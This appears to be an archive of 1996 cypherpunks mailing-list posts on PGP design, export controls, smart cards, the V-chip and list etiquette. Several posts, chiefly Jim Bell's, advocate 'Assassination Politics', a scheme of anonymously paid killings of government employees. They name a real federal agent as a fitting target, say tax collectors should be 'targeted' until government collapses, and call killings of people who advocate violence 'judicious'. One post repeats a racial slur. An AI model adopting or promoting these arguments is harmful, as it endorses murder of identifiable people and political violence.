>>Presidential campaigns, that kind of protection is expensive,
>>time-consuming, intrusive, and unlikely to be extended.
>
>I assume that both Declan and Jim Bell agree that people high in the
>government will be immune because they already enjoy this level of
>protection (limitation one).  So the only people we can hit are the cannon
>fodder, not the ones who gave the orders.  It has always been this way with
>war.

Actually, I think the primary targets will be either the middle level 
manager types, or the ones who have attracted a substantial amount of bad 
publicity by "following orders."  Lon Horiuchi (the sniper who shot Vicki 
Weaver) for example, would be a excellent example of a person who'd try to 
claim, "I was just following orders."  Okay, maybe he was, but so was Adolph 
Eichmann.  

Once the tax collectors/enforcers were targeted, the rest of the government 
wouldn't be able to operate, and would collapse.


>If, after a couple of the Waco people had been hit, I was given the
>responsibility to protect them I would proceed as follews:
>
>(1) Gather them and their families onto some Army base and step up the
>patrols.  Now I have them safe.

And, of course, you've just ruined their lives.  Think about it.  By doing 
this, it is made absolutely, completely, and abundantly clear to them that 
THEY are considered "the enemy" and that their lives are forever put at 
risk.   Previously, government employees could hold their heads up high and 
be proud of their "public service."  Now, if they're discovered, they have 
to disappear.  Does this treatment sound familiar?  Their job description 
and circumstances will more closely resemble that of a Mafia enforcer than a 
proud public servant.  They'll have to teach their children to lie about 
what their parent does, rather than risk getting exposed.

Who, exactly, would want to work for the government under such 
circumstances?  Remember, we're not just talking about a tiny fraction of 
their number; if the most egregious ones were hidden the ones that were less 
secure would be killed in their place.

Remember, the only reason the government can even afford so many employees 
is because taxes are collected; what happens when literally every IRS agent 
resigns to avoid the bullet or bomb?  The remainder, the "less bad" ones, 
couldn't be paid.  At that point, government collapses.


>(2) Train and release them thru the witness protection program.  Cost
>$20,000/person (if I remember the article John Young posted a pointer to
>correctly.  (Thanks John))  This is probably about the same as the cost of
>their training, so it makes economic sense.

Except that you can't do this for every government employee, and who's going 
to want to work for the government if it is made clear to them that someday 
they'll either be killed, or discovered, or they will have to "go 
underground" to survive.  Not a very good prospect.  And what happens if 
they think there's a fairly good chance that my system will succeed?  Most 
people want to be able to retire with a pension; what's the prospect for 
collecting a pension from a demolished government?!?

>
>(3) Make sure that the names/faces of the cannon fodder in future actions
>are not available to make it harder to target the guilty.
>
>Bill

Then they'll target the "names," the ones who show their faces.  See how this 
works?  If the only way  you can maintain the government is to keep them all 
absolutely anonymous, then that government has FAILED.

Furthermore, this system's anonymity allows disgruntled public employees the 
chance to collect money by "turning in" their bosses to the public's ire; if 
the personnel list for the government is nominally a secret, it will "leak" 
eventually and those on the list will be followed, confirmed, and targeted.

I'm not a betting man, but if I were forced to place a bet, your position 
doesn't have a prayer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 20:17:32 +0800
Subject: No Subject
Message-ID: <QQacwm01125.199602141204@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:28 PM 2/13/96 -0500, Rich Salz wrote:
>Okay, so how the hell did Microsoft get export approval for this? I mean,
>this is the classic crypto-with-a-hole; a service-provider interface (SPI)
>with DLL's means "plug your crypto here".  This is usually considered an
>"anciliary" device in ITAR language, and therefore export controlled.  I
>mean, how long until you see MSWord with "full privacy" option?
>
>Word I've heard is that the office of Export Control has had a lot of
>turnover and "nobody knows anything" anymore. 

At the risk of blowing my usual horn, I would argue that one advantage in 
vocal, common, and loudly hostile talk against government is that they have 
begun to understand how unhappy we are with them.  To make an analogy with 
late-1700's France,  the sound of a guillotine being tested probably had a 
remarkable effect on the upper strata of their society; likewise, dicussions 
of how we can all chip in and bump off the whole lot of the bastards might 
remind a few of they key government players that they are not immune from 
eventual retribution.  Resulting in "a lot of turnover."

If we make a "reasonable assumption" that most of those government employees 
aren't stupid, and they discover that the prospect for Crypto-Anarchy 
(trademark owned by Tim May?) is good, it seems reasonable to assume that 
they'll want to avoid being around when THE END comes for their employer.

Jim Bell

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSF8vvqHVDBboB2dAQExXQP+JHO6P80VfXE1+x5JmstA14dg+wlmXBK2
+8UYUnD7IpK2QzIKoEbmot2/WfUK/9zzOiuRuXvzc6FxfscRm7xNzNO28vviTN5U
osVNgm72t/R2jZspMPr+cYE3GcxDIcQvTEOth5Tz9J9q7TfI4+NPl68fN7sqEOsG
m44PPIy6F2I=
=m3hQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 20:24:33 +0800
Subject: No Subject
Message-ID: <QQacwm01488.199602141210@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 PM 2/12/96 EDT, E. ALLEN SMITH wrote:
>	I have changed the subject header (despite its destroying threading
>with the way my mailreader works) so that Perry et al can more easily filter
>this out. I have concluded that Assasination Politics, since it is a possible
>development of true anonymnity, etcetera, is a proper discussion topic for
>cypherpunks - while not cryptography in and of itself, it is a possible result
>of cryptography.

I'm glad some people see that.  This may, in fact, turn out to be one of the 
most important products of modern, public-key cryptography.


>From:	IN%"frantz@netcom.com" 12-FEB-1996 03:24:07.29
>
>>Again, absolutely.  Hell, I can't even devise a filter that will let me
>>filter out Jim Bell's rants while letting me see his reasoned arguments on
>>anonymous assassination.  (I would love to have him address the Salman
>>Rushdie issue, a man who is still alive despite a considerable announced
>>price for his head.  There appear to be limits to who can be subject to
>>assassination for pay.)
>
>	Actually, that's an argument for non-misusage of Assasination Politics.
>If the person hides, there's not much one can do about it. But a hiding
>law enforcement agent can't be out violating people's rights. 

Bingo!   That's why this system will be so effective; it will DETER bad 
behavior on the part of the government and its agents.


>(I will mention
>that whether a right is violated or not is essentially a matter of the
>perceiver - under any system, whether governmental or not. All ethical
>arguments assume either some degree of common ground that can be argued from,
>or the finding of logical inconsistency). Those who do so via the net can be
>taken care of via the other mechanisms discussed here. It's just that the
>physical part is a possible net weakness.
>	Moreover, just because _some_ rights-violaters (not that Rushdie was
>one) aren't killed doesn't mean that all of them wouldn't be. A system doesn't
>have to be 100% efficient to be effective.

Yup; it's interesting that Franz didn't see this... Maybe he just didn't
WANT to see it!


>	However, the Rushdie case does bring up one problem I have with
>Assasination Politics as currently constructed. While people are unlikely to
>patronize a general/non-discriminatory organization, a more particular but
>non-libertarian one is still possible. For instance, if the Christian
>Coalition put together an organization, anonymously, what would prevent them
>from offing everyone who was a major leader against them - such as a doctor
>researching new abortion techniques, or a geneticist (such as myself) doing
>gene therapy work they found offensive? The patrons would know that _they_
>wouldn't be targeted after all... I would appreciate a response from Jim Bell
>on this subject.
>	-Allen

Your question was actually a two-parter.  I will separate it below and 
comment on the pieces:


>For instance, if the Christian
>Coalition put together an organization, anonymously, what would prevent them
>from offing everyone who was a major leader against them -

"Who needs leaders"?  Think about this, carefully.  The current political 
system is based on the idea that if you don't like the way things are being 
done, you have to publicize your unhappiness, to organize, and for that  you 
normally "need" leaders.  With "Assassination Politics," _leaders_ will not 
only not be necessary, they might be the prime targets for unhappy people!  
But this will work both ways:  "Christian Coalition" LEADERS will be targets 
themselves if they publicly advocate the killing of abortion doctors.


> such as a doctor
>researching new abortion techniques, or a geneticist (such as myself) doing
>gene therapy work they found offensive? 

I wish there was some sort of "perfect, easy solution" to this dilemma, but 
it's possible there isn't.  Ultimately, anybody who does anything that 
angers enough people, ENOUGH, will be a potential target.  I don't think 
this is a major admission however; society has ALWAYS been this way.  In the 
early 1600's in Salem, women were killed simply due to false accusations 
that they engaged in 'witchcraft."  Governments have prosecuted (and 
persecuted) people for violation of what we now call victimless crimes.  In 
the pre-1960's South, being black was a de-facto "crime":  They could be 
arrested, tried, and convicted on a pretense.  Over 60% of prison cells are 
filled with people who sold chemicals (drugs) to willing buyers.

I think it's clear that there are ALREADY plenty of violations of rights 
going on; at most, you can claim that "Assassination Politics" is 
"imperfect" in the sense that it doesn't completely solve this problem.  But 
since I do genuinely believe it will eliminate war, militaries, governments, 
taxes, and other evils, I think we'll end up with a far better society than 
we have today.

>The patrons would know that _they_
>wouldn't be targeted after all... I would appreciate a response from Jim Bell
>on this subject.

All is not lost, however.  I contend that society would likely IMPROVE to 
the point where the kind of behavior you want to avoid will not commonly 
happen.  Wishful thinking?  Well, consider a point which was driven home to 
me a week ago at a dinner with my parents, sister and brother in law, and my 
two nieces, ages 4 and 9.  We were eating spareribs, and my father (age 65) 
commented that such meat used to be considered trash meat, and "only the 
niggers bought it."  (BTW, my father was not and is not a bigot, quite the 
opposite; he used this terminology to relate the general opinion during the 
time frame he grew up in; he used this terminology to reflect on and deride 
that public opinion back then.) 

My older niece looked mystified, and said she hadn't even HEARD the term 
"nigger." (and she's substantially above average in vocabulary and 
intelligence for age 9, BTW)   While I am not going to claim that bigotry is 
dead in the younger generation, I think it's clear that it went out of style 
in the 1960's and progress has since been made in eradicating most of its 
more egregious effects. In short, in that issue, society has improved, if by 
no other method than waiting for the bigots to die off naturally and develop 
a new generation of more tolerant people.  Call this "political correctness" 
if you wish (and I'm about as much an opponent of "political correctness" as 
you'll find) but the fact is that things are getting better with regards to 
race relations.

Similarly, I think that once public advocacy for killing abortion doctors 
and others was deterred (by judicious use of Assassination Politics, for 
example, even if a given example of such use might be considered "wrong" 
because it was a violation of "free speech") 
pretty soon it would be hard to gather much enthusiasm for such bad acts.  
Few people would risk calling publicly for that; the next generation will 
"never" hear such a thing, etc. 

Is it unreasonable for me to suggest that over time, the faults you fear 
will tend to disappear?










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 20:24:44 +0800
Subject: No Subject
Message-ID: <QQacwm01548.199602141213@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Howdy from Australia.

I am in the process of doing some research for an
article on our present bandwidth difficulties in 
Oz.

As a side issue, I wanted to cover the "overhead"
factor inherent in the TCP/IP (v4?) protocol 
which I understand is reduced under the proposed IPv.6 protocol.

I'd also like to discuss the "unfriendly" manner in which
web browsers such as Netscape hog resources by sending multiple
port access requests.

Can anyone point me towards recent papers which deal with these
issues?

TIA

Mark
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 20:41:33 +0800
Subject: No Subject
Message-ID: <QQacwn02602.199602141225@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> It seems that there a market demand for a stealth-capable product.
> Many peoples here seems to discuss it.  And for the time being, AFAIK,
> this type of products are used by a specific class of peoples, most of
> which knows what 'stealth' means.
> 
> So why is it that they design a program that would not permit the use
> of a feature considered desirable by it's customer base?

The big question I have for you is, what do you mean by "stealth" PGP?
Do you want a PGP message which doesn't say to whom it is encrypted?
Or do you want a PGP message which does not even acknowledge that it
is a PGP message?  If what you want is the former, then that can fit
under the PGP API fairly well.  If you want the latter, it will not.

The reason is that PGP, by definition, is a self-describing packet
format.  Without that description there is no general way for the PGP
library to discover what kind of message it is parsing order to
perform the proper operation to open the message.  OTOH, if just the
keyID is missing, the library will happily try all the keys on your
secret keyring until one succeeds or they all fail (I'm not sure if
this is implemented, but it fits quite nicely under the API).

The other question I have is: who do you think the "customers" of PGP
are?  If you think the majority of PGP's customers are the
crypto-privacy activitst types, you are highly mistaken.  PGP has hit
the main stream, and is being used by many non-crypto-aware people.
Probably more of them than there are of us.

If you want to discuss this more, let's take it to private email,
please.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 20:53:37 +0800
Subject: No Subject
Message-ID: <QQacwo03080.199602141232@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 2/13/96, Perry E. Metzger wrote:

>I will repeat, Tim. You have no job and do nothing for a living. For
>you it is probably hard to understand that some of us prefer to get
>our mail segregated by topic so that we don't have to spend more time

The issue of what I do with my time is a red herring. As it happens, many
folks in the "cyberspace activism" spend as much time or more as I do on
the Net. In any case, who cares how I spend my time?

I also note that for several years Perry was clearly spending a whole lot
more time than even I am now on the Net, making the "Top Ten Usenet
Posters," or somesuch.

I am sure that when Perry was a Shearson-Lehman, or Lehman Brothers, or
whatever it was called, and was posting several articles an hour on
Extropians, Cypherpunks, Libernet, Usenet, etc., that he would have roughly
the same reaction I am now having to someone writing: "Perry, you are
writing too much--some of us are trying to get some work done!" He would
likely have dismissed their complaints as irrelevant, that no one is forced
to read his articles.

Likewise today. No one is forced to read my posts, Perry's posts, or anyone
else's posts. This is what filters are for. As it happens, I do *not* read
all of the posts here. In fact, I delete about 90% of them after scanning
the first paragraph, the subject, and the author. Takes me about 15
seconds, tops, to do this, and sometimes I'm even faster. (Do the math: I
can "dispose of" about 50 or 60 messages a day in 10-15 minutes...and this
is about the best that can be hoped for, even if Perry were the moderator
and the 10 or so messages a day that are truly off the wall were screened
out...it just wouldn't change the basic time to screen all that much.)

>than needed reading our email. However, for some of us, time is
>money. I have failed to directly answer your comments on this sort of
>thing out of deference to your "elder statesman" status around here,

Spare me, Perry. As I mentioned, you certainly used to write a truly vast
number of rants to Extropians, Libernet, and, yes, even Cypherpunks. A
check of the archives will show this clearly.

It is well and good that you apparently are now very busy and cannot write
your customary number of articles. But spare us the insinuations (in
several of your perrygrams) that because you are too busy to write you are
doing critical work and because some of us use our time to write we are
slackers.

I write because setting down my thoughts and exploring ideas is far more
important to me than just about anything else I can imagine doing,
including writing C programs. If you don't like this, learn how to use
filters and filter me out, or leave the Cypherpunks list. Seems simple
enough to me.

--Tim May




>but this is getting silly. If you want to post about libertarianism,
>libernet, so far as I know, still takes postings. If you want to read
>about the habits of migrating birds, there are interest groups for
>that. We don't have a lot of good places to discuss specifically
>cryptography and its impact, and this group was set up *for that*.
>
>I mean, why not just have one mailing list for all topics of all sorts
>if "filtering" and "hitting the 'd' key" are supposed to be the only
>way we deal with this stuff, hmm?
>
>Perry

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 20:51:29 +0800
Subject: No Subject
Message-ID: <QQacwo03230.199602141234@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 PM 2/13/96, Perry E. Metzger wrote:

>Tim, you don't work for a living. Some of us do. You might try to
>think back and remember what it was like in the days when you still
>did something every once in a while and had a limited amount of time
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>available in which to do it.
>

Perry once again resorts to insults. Constantly belittling the efforts of
others suggests deepseated psychological doubts about his own
contributions.

Shows you the reaction I get for even responding to him. My mistake.

Perry should learn how to use mail filters, then he can simply filter out
all the stuff he doesn't want to see. Or, simply hitting the 'delete" key
in whatever reader he is using...surely typing "D" 20 or 30 times a day
takes far less time than writing one of his perrygrams?

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:12:19 +0800
Subject: No Subject
Message-ID: <QQacwp04974.199602141253@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz (rsalz@osf.org) wrote:
> Okay, so how the hell did Microsoft get export approval for this?

They didn't.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:24:47 +0800
Subject: No Subject
Message-ID: <QQacwq06920.199602141309@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>The Rushdie incident is simply so far removed from "Assassination Politics" 
>that it can't possibly be used to refute it; I still believe it actually 

You're a loon.  s/Rushdie/Khomeni/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:27:39 +0800
Subject: No Subject
Message-ID: <QQacwq06952.199602141309@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>When asked, he also indicated that the PGP 3.0 message formats would be 
>embedded into the API in such a way that it would not be possible to use 
>the library to generate or process stealth.

Mmmmm....  
It seems that there a market demand for a stealth-capable product.  Many peoples here
seems to discuss it.  And for the time being, AFAIK, this type of products are used
by a specific class of peoples, most of which knows what 'stealth' means.

So why is it that they design a program that would not permit the use of a feature 
considered desirable by it's customer base?

Regards to most CypherPunk.

JFA

**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:31:36 +0800
Subject: No Subject
Message-ID: <QQacwq07056.199602141311@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Perry E. Metzger
>
>Tim, you don't work for a living. Some of us do. You might try to
>think back and remember what it was like in the days when you still
>did something every once in a while and had a limited amount of time
>available in which to do it.
.......................................................................

That's right:  crytpo-anarchy is a time-consuming business, and there isn't
much time in which to prepare for the New Cyberspatial Millenium.

Everybody get Back To WORK !!

                     :>) 

   ..
>Blanc
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:33:00 +0800
Subject: No Subject
Message-ID: <QQacwr07664.199602141316@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


}        The headline in the Toronto Star this morning is "'SMART CARD'
}HERE WITHIN YEAR"
}        The idea is to have everyone in Ontario have a 'smart card' that
}will "keep track of everything from mammograms to speeding tickets". This
}card will "replace the existing health card, drivers's licence, social
}assistance identification, drug card, and senior identification".

Very convienient.  Why don't they just put bar codes on our foreheads at
birth and get it over with?

Seriously, what I want to know is how they plan to make one set of
information (drivers licence, soc security number) inaccessable to other
institutions like health and pharmacy.  This is even more of a concern if
the card becomes a method of payment.  Would each have it's own secret key
that would unlock only the relavent info?  That would be a big keyring.
Access time for a key and keeping the keys up to date in all the databases
around the country would have to be done.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:40:08 +0800
Subject: No Subject
Message-ID: <QQacwr08235.199602141322@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Why There Exists No Middle Ground in the Crypto-policy Debate

[This message only appears to be posted anonymously, if you
 have the correct tools, you can learn my name and e-address.
 Take that auto-WWW indexers!]

Decius <decius@ninja.techwood.org> recently presented an essay,
entitled ``Crypto-Absolutism,'' which described ``Why and how the
middle ground should be found in the crypto-policy debate.''  The
essay is clearly wrong in its assumptions and thus its conclusions.
Given the perceived flaws in the assumptions, his commentary must be
rebutted.

Within the context of this rebuttal, ``T-Camp Cypherpunks'' are those
``Cypherpunks'' (whatever they are :-) that follow a technology
evolution-based line of reasoning to arrive at the inevitable coming
of crypto-anarchy.  As well, ``A-Camp Cypherpunks'' are those that
advocate crypto-anarchy because they like the social and political
implications.  It is possible to be an A-Camp Cypherpunk or a T-Camp
Cypherpunk without being the other.  Of course, it is quite possible
to be both.  It has often been said on Cypherpunks, that ``we'' are
not a ``we''.  Decius falls into a trap by assuming that all
Cypherpunks are in the A-Camp.  This mistake colors the entire essay.

The main problem with Decius' essay is that it assumes that
Cypherpunks _merely_ advocate crypto-anarchy.  In fact, T-Camp
Cypherpunks do not stop at this puny point.  They observe that
crypto-anarchy is the _likely_ _outcome_ of the current technology
trend (this trend is discussed below).  Note that this observation of
fulfillment, if correct, is a far stronger statement than merely
advocating that crypto-anarchy should happen or would be a really good
idea.

A-Camp Cypherpunks also advocate that this trend should be exploited
to its conclusion, sooner rather than later, to preempt any massive
government crackdowns that would only prolong the transition pains.
The rationale being that these supposed government crackdowns have no
place in the natural evolution of a free society.  And that the
continuance of a free society is preferable to that of a move towards
a police state, which would be required to facilitate the useless ---
in the end --- crackdown on this information technology.

Decius is also wrong when he states that crypto-anarchy means people
will never again be accountable or recognized (pure A-Campers might
like this to be true, although I doubt it).  In the T-Camper's view,
crypto-anarchy means that people have the choice of when they wish to
be accountable and recognized for their statements and information
movement-related actions and when they wish otherwise.  People are not
forced under the crypto-anarchy model to be unaccountable or
unrecognizable.  Likewise, the crypto-anarchy model allows people to
ignore those that are unaccountable and unrecognizable, if they wish.
Decius fails to recognize that people could be recognized, and even
paid, for example, when operating under a pseudonym instead of
completely anonymously (this concept links two Cypherpunks favorites:
untraceable anonymous e-cash and anonymous reputations).

As primary counter-points to Decius on this issue:
- - The people who wrote the Federalists' Papers did so anonymously,
  yet I suspect that all were well-known and transacted business and
  other politics under their ``real names'' most of the time.
- - Individual articles are anonymously published in the _The Economist_
  yet I suspect that people are being paid to contribute information
  to this newspaper (at least, I know I am paying a lot per year, for
  a newspaper, to get the information :-).
- - The recently released ``Primary Colors'' book by Anonymous.  Yet
  this person, if the publisher is to be believed, is well-known to
  President Clinton (I think it may all just be a good marketing scam :-).

Back to the main point of unstoppable --- in a free society, at least
- --- technology trends.  Decius has not, but must, account for the
following change due to technology: Up until now, communication system
deployers (e.g. The Phone Companies) have been basically blackmailed
(through easily applied laws and licensing) into creating systems with
backdoors for government's use.  As system intelligence moves to the
end-user devices away from the internal network devices and encryption
moves to end-to-end encryption from link-based or non-existent
encryption, this form of blackmail will no longer work since there
will no longer be a small number of easily controlled entities
building and deploying the systems.  There will be open standards for
the interconnect itself [IPng or whatever].  And anyone will be able
to implement end-user devices that layer end-to-end encryption on top
of the raw interconnect services provided by the new network model.
In some ways, we have already arrived at the new interconnect model:
the Internet based upon IP.  In the form of today's computers, we also
have a rudimentary incarnation of the required intelligent end-user
device.

In sum, I am a T-Camp Cypherpunk not because I necessarily think
crypto-anarchy is a good idea but rather because the technology trend
will continue to make it happen.  I also happen to be an A-Camp
Cypherpunk but it is for the reason that I am a T-Camper alone that I
derive that there can be no compromise on the issue of crypto-policy.
Not only would it be a bad idea to compromise, but also any compromise
will fail due to continuing changes in technology that favor
intelligence in the end-user devices and end-to-end encryption over
intelligence in the internal network components and easily controlled
encryption.  It is better to see the technology trend and embrace it
to prepare for the new crypto-anarchy to come.  ~``Those that prepare
for the change will have a lot of success, while those that ignore the
technology trend in this area will be left behind.''~  Truer words have
never been spoken.

Regards,
Loren

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSGeTP8de8m5izJJAQFFrQP/ZQFu64mGC/u4YC7jAsnv22Cx3Eub+xVw
i3IYX7aHJopfG3g6IVifaGuEJmHxF6mZDHj+YSS/9fQfHUm7QZtoXmgmvxgWpP3s
KiUVLgYA3/cVfZn/6iOUHlQCehzj2N4IPdW2QGWbe2rbk1i1YaiGLpnB+RRXo4nW
r7mKrSVOjOQ=
=TIOb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 21:36:34 +0800
Subject: No Subject
Message-ID: <QQacwr08749.199602141327@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore <gnu@toad.com> reported:


>My favorite was his summary report on the OECD meeting in December,
>~steptoe/286908.htm, at which the US tried to parade some of the
>fruits of its behind-the-scenes efforts to convince other governments
>to become as authoritarian as the US government on crypto policy.

Why help "potential enemies"?  Why a govt risks it's cherished 
'national security'?


>If the US government can quietly convince other countries to support
>Clipper-like systems (including "mandatory key escrow" and "trusted
     It probably means that they already cracked the code... :)

Definitely, they are insane beyond the safety level...

JFA
**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 22:05:20 +0800
Subject: No Subject
Message-ID: <QQacwt11146.199602141347@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Feb 1996, Jeff Barber wrote:

> Ray Arachelian writes:
> 
> > So there are options for those who want less noise.  I do not beleive it 
> > is anyone's place to banish anyone from posting to the list, nor grading 
> > a person's worth based on past posts.
> 
> Every one of us "[grades] a person's worth based on past posts" and
> this is as it should be.  That's why my finger hovers only nanometers
> above the 'd' key when I see a post from, say, Vlad the Imposter.

I'm not talking about from a personal point of view, delete the stuff in 
your mailbox at will, I'm talking about NOT filtering messages that are 
sent to all from toad.com.  :)  There is a difference between deleting 
stuff you don't like for yourself, and deleting stuff you don't like for 
everyone.

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 14 Feb 1996 22:03:31 +0800
Subject: No Subject
Message-ID: <QQacwt11266.199602141348@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



It's real simple folks. Turn the damn set off.

If parents wont accept the responsiblity to monitor what their kids 
watch, then they get what they get. If I don't want my kids watching 
television when I am gone, then I take the remote with me, as that is the 
only way my TV works.

The V-chip, like every other type of electronic lockbox devised to date, 
is nothing more than a band aid trying to cover the real problem - lack 
of attention paid to one's children and what they are doing. A 
govermental solution designed to regulate and legislate morality. History 
has demonstrated that every time a government makes attempts to enforce 
what is considered the basic tenants of civilized behavior then the game 
has already been lost. The people and the politics have become so 
corrupted that no form of democracy will survive for long - as it is 
dependant on the individual's willingness to abide by the principle of 
personal honesty.

On Sun, 11 Feb 1996, Alan Olsen wrote:

> At 08:13 PM 2/11/96 -0800, Bill Frantz wrote:
> >The Dranged Mutand is far from deranged when he writes:
> >
> >At 12:09 PM 2/11/96 -0500, Deranged Mutant wrote:
> >...
> >
